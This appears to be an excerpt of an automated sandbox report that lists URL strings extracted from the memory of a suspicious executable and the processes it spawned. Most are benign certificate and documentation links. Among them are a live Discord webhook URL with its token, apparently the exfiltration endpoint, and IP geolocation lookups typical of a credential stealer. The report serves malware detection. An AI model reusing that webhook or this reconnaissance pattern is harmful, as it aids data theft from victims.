Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 3Af7PybsUi.exe, 00000003.00000003.1345407016.000001EC83513000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1354389864.000001EC83792000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC8378C000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1346812906.000001EC8350C000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855025804.000001EC8374C000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1345769900.000001EC8350C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: 3Af7PybsUi.exe, 00000003.00000003.1354389864.000001EC83792000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC8378C000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1354431682.000001EC837B1000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1354329613.000001EC841C4000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855025804.000001EC8374C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
Source: powershell.exe, 00000004.00000002.1694884569.000002936DA10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mL
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 3Af7PybsUi.exe, 00000003.00000003.1867200804.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
Source: svchost.exe, 00000012.00000003.2000977226.0000020614C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1690196252.0000029365943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.di
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: 3Af7PybsUi.exe, 00000003.00000003.1353848542.000001EC837E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: powershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1651080578.0000029355791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpaf99aaqq.exe, 00000009.00000003.1858874692.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2204657211.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2334469546.0000000002C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: python-3.11.0-amd64.exe, 00000019.00000003.2204657211.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2334469546.0000000002C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010(
Source: tmpaf99aaqq.exe, 00000009.00000003.1858874692.0000000002B8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010ilege
Source: powershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000004.00000002.1651080578.0000029355791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: 3Af7PybsUi.exe, 00000003.00000003.1866680280.000001EC88A12000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1857112889.000001EC88A07000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856686030.000001EC88A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
Source: powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: 3Af7PybsUi.exe, 00000003.00000003.1866680280.000001EC88A12000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1857112889.000001EC88A07000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856686030.000001EC88A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1266714407531057152/kGUAi8nU7KWK3s1rHPYHNujlEgOGwUolVWZOn2iBZWohl2W
Source: 3Af7PybsUi.exe, 00000003.00000003.1346710386.000001EC8320E000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1343896449.000001EC8320E000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1344920702.000001EC8320E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: 3Af7PybsUi.exe, 00000003.00000003.1337809163.000001EC82DAC000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1337809163.000001EC82D73000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1337999214.000001EC82DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: 3Af7PybsUi.exe, 00000003.00000003.1867200804.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: svchost.exe, 00000012.00000003.2000977226.0000020614C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000012.00000003.2000977226.0000020614C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: 3Af7PybsUi.exe, 00000000.00000003.1315602967.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000002.2235597551.000002643EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
Source: 3Af7PybsUi.exe, 00000003.00000003.1343724398.000001EC834C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
Source: 3Af7PybsUi.exe, 00000003.00000003.1343896449.000001EC83064000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1344920702.000001EC8305A000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1341884374.000001EC83094000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1341565116.000001EC83094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: 3Af7PybsUi.exe, 00000003.00000003.1866680280.000001EC88A12000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1857112889.000001EC88A07000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856686030.000001EC88A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipapi.co/
Source: 3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC83661000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC83661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: 3Af7PybsUi.exe, 00000003.00000003.1346812906.000001EC8347C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000004.00000002.1690196252.0000029365943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 3Af7PybsUi.exe, 00000003.00000003.1343550316.000001EC834FA000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1343550316.000001EC83535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
